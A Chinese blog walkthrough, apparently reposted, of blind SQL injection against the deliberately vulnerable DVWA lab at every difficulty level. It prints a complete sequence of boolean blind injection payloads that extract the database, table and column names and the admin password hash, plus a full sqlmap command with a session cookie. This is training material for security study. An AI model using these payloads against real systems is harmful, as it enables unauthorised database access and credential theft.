DVWA SQL Injection(blind)(SQL盲注)全等级
SQL Injection(blind)(盲注)
1. Low
手工注入方法
服务端只会返回不会显示搜索值,此类无回显的SQL注入称作SQL盲注。
本题只会返回用户存在与否,即真假,此类盲注成为布尔(bool)盲注。
注入思路是猜解库表字段和数据的长度,每个猜完长度之后猜解每一位字符的ascii值,然后拼接之后形成字符。
1' and length(database())=4 #库长度41' and ascii(substr(database(),1,1))=100 #1'+and+ascii(substr(database(),2,1))=118 #1'+and+ascii(substr(database(),3,1))=119 #1'+and+ascii(substr(database(),4,1))=97 #库名dvwa------------------------------------------------------------------------------1' and (select count(table_name) from information_schema.tables where table_schema='dvwa')=2 #表个数2个1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9 #第一个表长度91' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 1,2),1))=5 #第二个表长度5------------------------------------------------------------------------------1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=117 #1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),2,1))=115 #1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),3,1))=101 #1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),4,1))=114 #1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),5,1))=115 #表名users------------------------------------------------------------------------------1' and (select count(column_name) from information_schema.columns where table_schema=database() and table_name='users')=8 #表有8个字段1' and (select count(*) from information_schema.columns where table_schema=database() and table_name='users' and column_name='user')=1 #1' and (select count(*) from information_schema.columns where table_schema=database() and table_name='users' and column_name='password')=1 #表里有user和password字段------------------------------------------------------------------------------1' and (select count(*) from users where user='admin' and password='5f4dcc3b5aa765d61d8327deb882cf99')=1 #存在user为admin和password为5f4dcc3b5aa765d61d8327deb882cf99(password)的字段。
最后猜到一个账号为admin密码为password的数据,尝试登录发现登录成功。
2.Medium
多了mysqli_real_escape_string函数
数值型注入
基本思路和Low一样,因为只能选择仅有的几个选项,所以要在burp里抓包发送数据包注入。
然后mysqli_real_escape_string()函数过滤掉了一些特殊字符,用到单引号的时候要把值修改成16进制然后替代之前的值
下图可以看到盲注成功。
3.High
多了LIMIT 1,但因为可以注释,所以LIMIT没什么用
用burp抓包修改,思路和Low不能说一样,只能说一模一样
4.Impossible
和SQL回显注入篇的Impossible一样加了好多限制,所以无法注入。
5.运用sqlmap自动化注入
当涉及到大量重复的猜解的时候,脚本工具的优势就体现到了,自动化注入真的太舒服了!
试一下sqlmap注入盲注High等级
输入如下
python sqlmap.py -u “192.168.171.10/vulnerabilities/sqli_blind/cookie-input.php”--data="id=3&Submit=Submit"--second-url “http://192.168.171.10/vulnerabilities/sqli_blind/”--cookie=“id=121; PHPSESSID=vcgj00i5rqo0ceeti439abogs4; security=high”--batch
-u指定url地址,–data指定POST传递的数据,
–second-url指定二阶响应的结果显示页面的url,本等级中192.168.171.10/vulnerabilities/sqli_blind/cookie-input.php为输入参数的地址,而http://192.168.171.10/vulnerabilities/sqli_blind/为显示结果的地址,两个不在同一个页面上,所以要设置second-url
–cookie指定cookie值,–batch表示不询问用户输入选择,自动使用默认配置
下图为注入最终结果
版权说明 : 本文为转载文章, 版权归原作者所有 版权申明
原文链接 : https://blog.csdn.net/weixin_49125123/article/details/122031960
内容来源于网络,如有侵权,请联系作者删除!